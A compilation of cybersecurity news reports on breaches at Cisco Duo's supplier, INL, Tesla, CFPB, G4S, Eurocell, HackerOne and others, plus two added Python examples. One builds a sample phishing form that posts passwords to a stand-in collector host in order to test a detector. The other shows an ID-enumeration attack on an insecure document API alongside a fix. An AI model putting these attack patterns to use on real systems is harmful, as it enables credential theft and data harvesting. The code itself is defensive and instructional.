
Cisco Duo Warns of Third-Party Breach Exposing SMS and VoIP MFA Message Logs

Cisco Duo, which provides multi-factor authentication (MFA) and single sign-on services, has disclosed a breach at a third-party telephony supplier that exposed logs of the SMS and VoIP messages Duo uses to deliver MFA codes. 

On April 1, 2024, Cisco Duo's security team warned customers of a cyberattack on its telephony provider, which transmits Duo's SMS and VoIP MFA messages. According to reports, the attackers used an employee's credentials, obtained through phishing, to get into the provider's systems. 

Once inside, the attackers downloaded SMS and VoIP MFA message logs tied to specific Duo accounts for the period from March 1 to March 31, 2024. The provider says the attackers neither read message contents nor used their access to send messages to customers, but the logs themselves (which include the phone numbers to which codes were sent) are enough to build convincing, targeted phishing. 

That is the practical risk for affected organizations: an SMS that references a real, recent MFA prompt is far more believable, and a user who trusts it may hand over a corporate credential or a live code. Cisco Duo worked with the provider on the investigation and on additional controls; the compromised credentials were invalidated and measures were put in place to reduce the chance of a recurrence. 

The provider also gave Cisco Duo access to all of the exposed message logs so that the scope and impact of the breach could be assessed. Cisco Duo has nonetheless urged affected customers to watch for SMS phishing and social engineering built on the stolen information, and to notify users whose phone numbers appear in the compromised logs so that they know what to expect. 

Cisco has also asked customers to report any suspicious activity promptly. The incident is a reminder that an MFA deployment is only as strong as the channel that delivers the second factor: SMS and VoIP codes depend on a carrier relationship the customer neither sees nor controls, so proactive monitoring, regular security assessments, and ongoing user education remain necessary alongside the technology itself. 

The breach also illustrates supply-chain exposure. An organization can harden its own environment and still be affected through a service provider, so businesses should evaluate the security practices of their vendors and maintain a process for managing third-party risk. 

Organizations that prioritize sound security controls, build a culture of resilience, and work closely with trusted partners are better placed to contain the effects of incidents like this one.

Idaho National Laboratory Suffers Data Breach, Employee Data Compromised


Idaho National Laboratory (INL), the nuclear energy research lab that employs an estimated 5,700 specialists, has suffered a major breach of its systems.

The breach took place on Sunday, November 19. The stolen data comprises sensitive information on the laboratory's employees, which was later leaked on an online forum. 

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI are investigating in collaboration with INL, a spokesperson said. Physical addresses, bank account details, and Social Security numbers are among the data affected.

The spokesperson told local news outlet EastIdahoNews.com that the attack hit INL's Oracle HCM system, a cloud-based workforce management platform that provides payroll and other HR functions.

SiegedSec, a self-styled hacktivist group, has claimed responsibility for the attack and published a sample of the stolen employee data on a data-breach forum, including full names, dates of birth, email addresses, contact details, and other identity information for INL employees. 

The group, which seems to have political motivations, was also accused in the past of stealing information from the Communities of Interest Cooperation Portal, an unclassified information-sharing portal run by NATO.

INL has not indicated whether the breach affected any classified information or nuclear research, and CISA did not immediately respond to a request for comment. 

Regardless of whether the classified nuclear details were accessed by the threat actors, Colin Little, security engineer at the cybersecurity firm Centripetal, said it is "highly disconcerting that the staff generating that intellectual property and participating in the most advanced nuclear energy research and development have had their information leaked online."

"Now those who are politically motivated and would very much like to know the names and addresses of the top nuclear energy researchers in the U.S. have that data," he said. 

INL supports large-scale initiatives for the Department of Energy and the Department of Defense, and bills itself as "a world leader in securing critical infrastructure systems and improving the resiliency of vital national security and defense assets."

Tesla Begins Notifying Individuals Impacted in a Data Breach Incident

 

Tesla has acknowledged a data breach affecting around 75,000 individuals, but the incident is the result of a whistleblower leak rather than a malicious attack. 

The company informed US authorities that a data breach found in May exposed the personal information, including social security numbers, of over 75,700 people.

According to a notice letter issued to those affected, the data breach is the result of two former workers sending private data to the German news publication Handelsblatt. Tesla stated that the former employees "misappropriated the information in violation of Tesla's IT security and data protection policies." 

The leaked data includes names, contact information, and employment-related details for current and previous employees. Individuals affected are being offered credit monitoring and identity protection services. 

The leak came to light in May, when Handelsblatt reported that a whistleblower had given it 100 GB of confidential Tesla data. According to the publication, Tesla had not adequately protected the data of its partners, customers, and employees. 

The leaked 'Tesla Files' reportedly contained information on more than 100,000 current and former employees, customers' bank account details, production trade secrets, and customer complaints about driver-assistance systems. Handelsblatt has assured Tesla that it does not intend to publish the personal information it received. 

Given that the data went to a news outlet rather than to a criminal market, the chances of the exposed data being misused appear limited, and Tesla likely began the breach-notification process because of its legal obligations. Tesla has sued the former employees responsible; its lawyer described the leaker as a "disgruntled former employee" when the leak was discovered. 

“These lawsuits resulted in the seizure of the former employees’ electronic devices that were believed to have contained the Tesla information. Tesla also obtained court orders that prohibit the former employees from further use, access, or dissemination of the data, subject to criminal penalties,” the car manufacturer noted in its recent breach notification.

Data of 2.5 Lakh Customers Sent to Personal Account by CFPB Employee

 

The Wall Street Journal reported that a Consumer Financial Protection Bureau (CFPB) employee forwarded records to a personal email address. The records included confidential supervisory information on 45 financial institutions and personal information on roughly 256,000 customers of one institution.

The agency, which was already under siege from Republican lawmakers, presented the breach to Congress as a catastrophic incident. 

The emails contained customer information from seven businesses, although the majority of the personal data was linked to customers at one unnamed institution, a CFPB spokeswoman told the Journal. 

The agency first discovered the incident in February and disclosed it to lawmakers on March 21, according to the Journal. The CFPB did not say why the employee, who has since been fired, forwarded the emails to a personal account. 

The CFPB, playing down the severity of the leak, said the personal information consisted of two spreadsheets containing names and transaction-specific account numbers that the financial institution used internally.

According to the representative, the spreadsheets do not contain the customers' bank account details and cannot be utilised to access a customer's account. As of Wednesday, the former CFPB employee had not complied with a request to erase the emails. Republican lawmakers seized on the data leak and demanded additional information from Director Rohit Chopra in statements they released. 

The CFPB has expanded enforcement efforts against the mortgage industry under Chopra, which has increased compliance expenses.

In October, Mortgage Bankers Association President and CEO Bob Broeksmit described the agency as a "judge, jury, and executioner all rolled into one." 

He urged the government to "establish clear and consistent standards, providing notice and comment when enacting rules. Unfortunately, the Bureau does not often follow this reasonable procedure, announcing new legal responsibilities without formal process or deliberation, enforcing novel and untested legal theories, and making it extremely difficult for businesses to grasp their legal obligations." 

The agency is also fighting constitutional challenges on several fronts. The Supreme Court has agreed to hear a case on the agency's funding structure, under which it is funded by the Fed rather than through appropriations legislation passed by Congress. In 2022, a panel of Trump appointees on the Fifth Circuit U.S. Court of Appeals ruled that funding mechanism unconstitutional. 

The funding provisions for the CFPB were found to be constitutional in March by the Second Circuit U.S. Court of Appeals, which includes the districts of Connecticut, New York, and Vermont.

Bogus DHL Emails Enable Attackers to Hack Microsoft 365 Accounts

 

Researchers have uncovered a phishing campaign that impersonates logistics giant DHL to steal Microsoft 365 credentials from victims in the education sector. Security firm Armorblox found that more than 10,000 emails were sent to inboxes belonging to a "private education institution". 

The email is designed to appear to be from DHL, with the company branding and tone of voice one would expect from the shipping giant. The recipient is informed in the email titled "DHL Shipping Document/Invoice Receipt" that a customer sent a parcel to the incorrect address and that the correct delivery address must be provided.

False login prompt
The email apparently includes an attachment, labeled "Shipping Document Invoice Receipt," which, when opened, appears to be a blurred-out preview of a Microsoft Excel file.

A Microsoft login page appears over the blurred-out document, attempting to deceive people into believing they must log into their Microsoft 365 accounts in order to view the file's contents. If the victims provide the login credentials, they will be sent directly to the attackers.

Armorblox explained, “The email attack used language as the main attack vector in order to bypass both Microsoft Office 365 and EOP email security controls. These native email security layers are able to block mass spam and phishing campaigns and known malware and bad URLs. However, this targeted email attack bypassed Microsoft email security because it did not include any bad URLs or links and included an HTML file that included a malicious phishing form.”

Businesses can safeguard themselves against phishing attacks by training their employees to recognize red flags in their inboxes, such as the sender's email address, typos and spelling errors, a feeling of urgency (legitimate emails almost never require the user to respond urgently), and unexpected links/attachments.

According to the researchers, the emails were sent from a legitimately registered domain, so they passed Microsoft's email authentication checks. SPF, DKIM and DMARC confirm that a message really came from the domain it claims; they say nothing about whether that domain has any right to call itself DHL.
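
An added example (not Armorblox's code or anything from the original post) of why the two native checks this campaign defeats are not enough, and what a mail-filter rule can look at instead. It parses a constructed message modelled on the description above, notes that SPF and DKIM passed, flags a From display name that claims a brand the sending domain does not belong to, and scans the HTML attachment for a form that collects a password and posts it somewhere other than a genuine Microsoft sign-in host. The sample message, the domain dhl-notify.example, the collector URL, and the trusted-host and brand lists are all assumptions made for this example.

```python
import email
import email.utils
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumptions made for this example: the hosts a genuine Microsoft sign-in
# form would post to, and the domains a message from "DHL" could legitimately use.
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}
BRAND_DOMAINS = {"dhl": ("dhl.com", "dhl.de")}


class FormScanner(HTMLParser):
    """Collect each <form>'s action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def credential_forms(html):
    """Actions of forms that take a password and post to an untrusted host."""
    scanner = FormScanner()
    scanner.feed(html)
    hits = []
    for form in scanner.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        if form["password"] and host not in TRUSTED_LOGIN_HOSTS:
            hits.append(form["action"])
    return hits


def auth_passed(msg):
    """True when the receiving MTA recorded spf=pass and dkim=pass."""
    results = msg.get("Authentication-Results", "")
    return all(re.search(rf"\b{m}=pass\b", results) for m in ("spf", "dkim"))


def brand_mismatch(from_header):
    """True when the display name claims a brand the sender domain is not."""
    name, addr = email.utils.parseaddr(from_header)
    domain = addr.rpartition("@")[2].lower()
    return any(brand in name.lower() and not domain.endswith(legit)
               for brand, legit in BRAND_DOMAINS.items())


def triage(raw):
    """Run all three checks over a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    forms = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() == "text/html" or name.endswith((".htm", ".html")):
            body = part.get_content()
            if isinstance(body, bytes):
                body = body.decode("utf-8", "replace")
            forms.extend(credential_forms(body))
    return {
        "authenticated": auth_passed(msg),  # passing SPF/DKIM is not a clean bill of health
        "brand_mismatch": brand_mismatch(msg["From"] or ""),
        "credential_forms": forms,
    }


def build_sample():
    """Constructed message modelled on the campaign; not a real captured email."""
    html = """<html><body>
<img src="blurred-invoice.png" alt="Shipping Document Invoice Receipt">
<div style="position:absolute;top:120px;left:200px">
  <form action="https://dhl-notify.example/collect.php" method="post">
    Sign in with your Microsoft account to view the document
    <input name="login" type="email">
    <input name="passwd" type="password">
    <input type="submit" value="Sign in">
  </form>
</div></body></html>"""
    msg = EmailMessage()
    msg["From"] = "DHL Express <notice@dhl-notify.example>"
    msg["To"] = "staff@school.example"
    msg["Subject"] = "DHL Shipping Document/Invoice Receipt"
    msg["Authentication-Results"] = ("mx.school.example; spf=pass smtp.mailfrom=dhl-notify.example; "
                                     "dkim=pass header.d=dhl-notify.example")
    msg.set_content("A customer sent a parcel to the wrong address. "
                    "Open the attached receipt and confirm the correct delivery address.")
    msg.add_attachment(html, subtype="html", filename="Shipping Document Invoice Receipt.html")
    return msg.as_bytes()


if __name__ == "__main__":
    print(triage(build_sample()))
```

The point of the design is that no single signal is decisive: the message authenticates cleanly, contains no URL in its body, and carries no malware, which is exactly why Armorblox says the native filters let it through. The brand/domain mismatch and the off-host password form are the two things that remain visible, and either alone is enough to quarantine the message for review.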

California's Consumer Privacy Act has Been Updated

 

California's consumer privacy law was strengthened on January 1 under a ballot initiative that voters approved in 2020. The updated law imposes new requirements on companies to give employees more control over how their personal data is collected and used.

What does California's Consumer Privacy Act imply?

Governor Brown signed the California Consumer Privacy Act (CCPA) into law in June 2018. The landmark legislation sets requirements on how California businesses collect, use, and disclose Californians' data, and gives California residents a set of data rights comparable to those in Europe.

The California Privacy Rights Act (CPRA), which amends the historic California CCPA by extending its protections to staff, job seekers, and independent contractors, will go into effect on January 1, 2023, and firms that employ California residents must ensure they have taken the necessary steps to comply by that date.

An updated version of CCPA

Under the law, California residents can ask that their data be corrected, deleted, or not sold. Those rights now apply to employers for the first time.

If you've noticed those boxes at the bottom of almost every website asking about your preferences for data privacy, you know the California privacy legislation has a significant impact. Employment lawyer Darcey Groden of Fisher Phillips predicts that it will also apply to employers.

While many businesses have the infrastructure to handle customer data, Groden noted that the employment relationship is considerably more complex: a great deal of data about employees is collected continuously.

In most cases, you will need to account for your human resources file, health information, emails, and surveillance footage. This law is exceedingly intricate and it will be expensive to adhere to it. According to Zoe Argento, it will be particularly difficult for businesses that do not deal with consumers, for instance, businesses in the manufacturing and construction industries.

Companies with many employees that gather a lot of data, such as gig platforms, could also be significantly affected. They typically do not have a privacy department, so this is new territory for them. Greater transparency could also bring more accountability over how some platforms use worker data to shape their algorithms.

Over 50% of Twitter Staff are Sacked by Elon Musk


Elon Musk, Twitter's new owner, defended the decision on Saturday, saying there was "no choice" because the firm was losing millions of dollars a day. The defence came amid widespread layoffs at Twitter around the world, including in India, and the outcry that followed.

Elon Musk made the decision to fire over 50% of the Twitter workers. After overnight limiting access to the company's headquarters and internal systems, employees were notified by email of their employment status.

Departing employees are announcing their exits on Twitter with the hashtag #LoveWhereYouWorked and a saluting emoji. Musk justified the decision by saying the business was losing $4 million a day. Everyone who lost their job was given three months' severance pay.

In contrast to a profit of $66 million during the same period last year, the corporation reported a net loss of $270 million for the second quarter that concluded on June 30, 2022. There are rumors that up to half of Twitter's 8,000 jobs could be eliminated. The website has trouble turning a profit. Making a dent in the salary cost is one method to solve the issue.

Simon Balmain, a senior community manager for Twitter in the UK, said that he had been signed out of both his work laptop and the Slack chat app, leading him to fear that he had been fired.

After already terminating some employees, several Twitter employees on Thursday night filed a class action complaint, according to CNN, alleging that Twitter violated the federal and California Worker Adjustment and Retraining Notification Act (WARN Act).

Under the WARN Act, if a mass layoff "affects 50 or more employees at a single site of employment," the employer must give 60 days' written notice in advance. Twitter has also let go of the majority of its more than 200 Indian staff. According to sources, the engineering, sales and marketing, and communications teams will all be affected.

Following Elon Musk's takeover of the social media company, Twitter founder Jack Dorsey finally spoke out about the widespread layoffs. He stated, " I realize many are angry with me. I own the responsibility for why everyone is in this situation: I grew the company size too quickly. I apologise for that.”

The cost-cutting comes alongside criticism of Twitter's efforts to raise money by proposing to charge $8 (£7) per month for the blue "Verified" check mark. Those who pay could receive more promotion for their tweets and see fewer advertisements in addition to the verification badge.

Twitter has not turned a profit for several years, and its monthly user base of around 300 million has remained broadly flat. Experts cautioned that dismissing half of its workforce could hamper Twitter's ability to combat misinformation, particularly with the US midterm elections set for next week.

Australian Security Firm G4S Hacked, Staff on Alert


Ransomware Attack, G4S Breached

Current and former employees of security company G4S have been warned to be vigilant after a ransomware attack in which personal information was stolen and posted online. The leaked data includes tax file numbers, medical checks, and bank account details. 

The attack follows the massive Optus data breach in Australia and two further breaches, and comes as the government plans to reform cybersecurity law and introduce higher penalties under the Privacy Act.

G4S offers services to Australian prisons

G4S offers services to prisons throughout Australia, earlier it offered services to offshore detention centers on Manus Island, belonging to the federal government. 

It informed current and former staff earlier this week that it had suffered a cyber incident in which an unauthorised third party gained access to its systems and deployed malware. 

Guardian Australia understands the incident to be the ransomware attack on Port Phillip prison that it reported in early July. 

"Guardian Australia was also alerted on Tuesday to another Optus-style data breach involving an employment agency. The breach was the result of a similar open application programming interface (API) to that believed to have been breached in the Optus attack. Personal documents such as photos of passport pages and Covid-19 vaccination certificates were accessible via the vulnerability."

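The "open API" pattern named in that quote, as an added example: this is illustrative code written for this page, not anything from G4S, Optus, the employment agency or the Guardian, and the records, tokens and handlers are made up. A document-download endpoint takes a numeric id. The vulnerable handler needs no session and the ids are sequential, so anyone can walk the range and collect other people's documents; the hardened handler requires a session, checks that the caller owns the document, and returns a uniform 404 otherwise. The last function shows the trail such a walk leaves in an access log, which is what you would alert on.

```python
from dataclasses import dataclass

# Constructed data for the example: document id -> (owner, filename), and
# session token -> user. None of this reflects any real system.
DOCUMENTS = {
    1001: ("u1", "passport-page.jpg"),
    1002: ("u2", "vaccination-certificate.pdf"),
    1003: ("u1", "driver-licence.png"),
}
SESSIONS = {"tok-u1": "u1", "tok-u2": "u2"}


@dataclass
class Response:
    status: int
    body: str = ""


def get_document_open(doc_id, headers):
    """Vulnerable handler: no session required, no ownership check, sequential ids."""
    doc = DOCUMENTS.get(doc_id)
    return Response(200, doc[1]) if doc else Response(404)


def get_document_fixed(doc_id, headers):
    """Hardened handler: bearer session required, object-level authorization,
    and a uniform 404 so callers cannot learn which ids exist."""
    auth = headers.get("Authorization", "")
    token = auth[len("Bearer "):].strip() if auth.startswith("Bearer ") else ""
    user = SESSIONS.get(token)
    if user is None:
        return Response(401)
    doc = DOCUMENTS.get(doc_id)
    if doc is None or doc[0] != user:
        return Response(404)
    return Response(200, doc[1])


def enumerate_ids(handler, start, stop, headers=None):
    """What an attacker does against an enumerable id space: walk it and keep the hits."""
    headers = headers or {}
    found = {}
    for doc_id in range(start, stop):
        resp = handler(doc_id, headers)
        if resp.status == 200:
            found[doc_id] = resp.body
    return found


def enumeration_suspects(access_log, threshold=5):
    """Clients with at least `threshold` 404s in a (client, status) log: a walk
    over ids against the hardened handler leaves exactly this trail."""
    misses = {}
    for client, status in access_log:
        if status == 404:
            misses[client] = misses.get(client, 0) + 1
    return sorted(c for c, n in misses.items() if n >= threshold)


if __name__ == "__main__":
    print("open API:", enumerate_ids(get_document_open, 1000, 1010))
    print("fixed, no session:", enumerate_ids(get_document_fixed, 1000, 1010))
    print("fixed, as u2:", enumerate_ids(get_document_fixed, 1000, 1010,
                                         {"Authorization": "Bearer tok-u2"}))
```

Unguessable ids and rate limiting raise the cost of enumeration but are not a substitute for the ownership check; an authenticated user can still walk the range, which is why the 401 and 404 responses are deliberately uninformative and why the 404 burst is worth alerting on.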
What can the victims do?

G4S learned in mid-September that some data had been leaked online, but only told affected staff about the extent of the attack and the documents compromised in an email earlier this week. 

The stolen data includes employee names, dates of birth, address, medical and police records, contact info, bank account details, tax file numbers, license details, and Medicare numbers. 

In some cases, health information given to the company, payslips, WorkCover claims, and incident reports were also leaked.

Although the incident began at Port Phillip prison, the attacker gained access to the company's entire network across Australia. 

Number affected not confirmed

The number of staff affected is not yet known. G4S did not answer questions about how many people were hit, saying instead that it is working with affected individuals to provide them full assistance. 

G4S advised the victims to change their identity documents but didn't provide compensation for replacements or give credit monitoring. 

The Guardian reports:

"Separately, photos of identity documents – including driver licenses – of hundreds of thousands of the company’s clients were publicly available via Google image search results because users had uploaded their licences as their profile photo. The company has since acted to prevent users from uploading sensitive documents to profiles."

Attackers Compromise Employee Data at PVC-Maker Eurocell

According to a law firm, a leading British PVC manufacturer has been contacting current and former employees to notify them of a "substantial" data breach. 

Derbyshire-based Eurocell, which also distributes uPVC windows, doors, and roofing products, disclosed the incident in a letter to those affected, according to data protection law firm Hayes Connor. The letter reportedly explains that an unauthorised third party gained access to the company's systems.

The compromised data included employment terms and conditions, dates of birth, next of kin, bank account, NI and tax reference numbers, right-to-work documents, health and wellbeing documents, learning and development records, and disciplinary and grievance docs. That's a lot of information for potential fraudsters to use in subsequent phishing or even extortion.

Eurocell has reportedly said there is no evidence the data has been misused, but that will be of little comfort to those affected. It is also not known how many employees were affected.

“The company has over 2,000 current employees, but it is possible that many more former employees could also be at risk given the type of information that has been exposed,” warned Hayes Connor legal representative, Christine Sabino.

“Every employer has various obligations when it comes to data security, which means they have a duty to keep sensitive information secure. This type of incident warrants a significant investigation. Our team has started to make our own enquiries into the case and are determined to ensure our clients get the justice they deserve.”

Hayes Connor made headlines earlier this year when it announced that over 100 current and former employees of a leading luxury car dealership would sue the firm following a data breach. On that occasion, they were dissatisfied with LSH Auto's lack of transparency regarding the incident.

HackerOne Employee Stole Data From Bug Bounty Reports for Financial Advantages

 

HackerOne has published details of a former employee who, it says, accessed company data for personal financial gain. The individual took vulnerability details from security reports submitted to the bug bounty platform and tried to disclose the same vulnerabilities to the affected customers outside the platform. 

According to HackerOne, the employee had access to the data between April 4 and June 23, 2022. On June 22, 2022, a customer alerted HackerOne after receiving a near-identical vulnerability report both through the platform and directly from the individual. 

“This is a clear violation of our values, our culture, our policies, and our employment contracts,” the platform stated. 

“In under 24 hours, we worked quickly to contain the incident by identifying the then-employee and cutting off access to data. We have since terminated the employee, and further bolstered our defences to avoid similar situations in the future.” 

According to HackerOne, the submitter of this off-platform disclosure "reportedly used intimidating language in conversation with our customer," and the actor's intent was to collect more bounties. HackerOne also stated that, after consulting with lawyers, it will determine if a criminal referral of this situation is necessary. 

A HackerOne spokesperson informed The Daily Swig: “Since the founding of HackerOne, we have honoured our steadfast commitment to disclosing security incidents because we believe that sharing security information is essential to building a safer internet. 

“At HackerOne, we value the trusted relationships with our customers and the hacking community. It’s important for us to continue to demonstrate transparency as a core tenet of Corporate Security Responsibility and therefore shared this Incident Report.” 

The spokesperson added: “Our Code of Conduct sets the foundation for building trust. We will continue to prioritize coordinated disclosure and to act fast to ensure we uphold these strong standards.”

McMenamins Struck by Ransomware Attack, Employee Data at Risk

 

McMenamins, a Portland hotel and brewpub chain, was struck by a ransomware attack on Wednesday that may have stolen employees' personal information, but no customer payment information seems to have been compromised. 

The ransomware attack was discovered and stopped on December 12, according to McMenamins. The company stated it alerted the FBI and contacted a cybersecurity firm to figure out where the attack came from and how extensive it was. 

Employee data such as names, residences, dates of birth, Social Security numbers, direct deposit bank account information, and benefits records may have been acquired, according to the firm in a news release, but "it is not currently known whether that is the case." 

"To provide employees with peace of mind, McMenamins will be offering employees identity and credit protection services, as well as a dedicated helpline through Experian," the company stated. "A payment processing service manages the collection of such information. Further, this information is not stored on company computer systems impacted by the attack."  

Many operational systems have been taken offline, including credit card scanners, necessitating temporary alterations in payment procedures at some McMenamins sites. There is "no indication" that consumer payment data has been hacked, according to the firm. 

The co-owner, Brian McMenamin stated, “What makes this breach especially disheartening is that it further adds to the strain and hardship our employees have been through in the past two years.” 

“We ask that our customers give our employees extra grace as we make temporary adjustments in the way we process transactions and reservations, given the impacts to our systems by this breach.” 

The company said it is not yet clear when the problem will be resolved and systems restored. Kerry Tomlinson, a cyber news reporter with Ampere News, said there are a few things firms can do to help mitigate such attacks. 

"As a business, you need to have backups," Tomlinson said. "If ransomware hits and they're demanding ransom for you to get your files back, you can say thanks a lot but I already have backups." 

"It will happen more and more and it's only going to get bigger. If you're not paying attention now, you need to pay attention." 

Employees can help prevent cyberattacks, Tomlinson said, by avoiding suspicious emails, using a unique password for each website, and enabling multi-factor authentication for an extra layer of security. Despite the breach, all McMenamins locations remain open.

Personal Details of SA Gov Employees Compromised in Frontier Software Ransomware Attack

 

The South Australian government has revealed that personal details of tens of thousands of its employees were exfiltrated in a cyberattack on the systems of its external payroll provider, Frontier Software.

According to South Australia Treasurer Rob Lucas, the payroll provider has informed the government that some of the data have been leaked on the dark web, with at least 38,000 employees and up to 80,000 government employees possibly having their data accessed. 

The stolen data contained taxation IDs of 38,000 Australian government employees, information on names, date of birth, home address, bank account details, employment start date, payroll period, remuneration, and other payroll-related details.

The government was particularly concerned regarding staff’s private data being stolen, as well as the potential for identity fraud, but there was no evidence that the information had been used by the hackers, Lucas added.

Frontier Software suffered a ransomware attack on November 13, 2021. The attack did not pivot into client systems through its products, and the data exfiltration was limited to a specific segmented environment, the payroll provider said. 

"To date, our investigations show no evidence of any customer data being exfiltrated or stolen. Whilst the incident resulted in some of Frontier Software's Australian corporate systems being encrypted, Australian customer HR & Payroll data and systems are segmented from the corporate systems and were not compromised," it said on November 17.

The impacted staff has been advised to treat incoming emails, calls, and SMS with caution. Additionally, everyone is advised to reset their passwords and activate two-factor authentication where possible. 

Government employees should closely monitor bank statements and account activity and report any suspicious transactions to the authorities. Exposed people can take advantage of a free IDCARE cyber-security support service offering, following the instructions laid out on the incident announcement on the SA government website.

According to Nev Kitchin, general secretary of the South Australian Public Service Association, the situation was "obviously very concerning". "We expect the state government to take all possible steps to review its cyber security measures in order to prevent such an event in the future. In the meantime, we expect the government to do everything possible to minimize the effects of this security breach and to provide the support our members need," he said.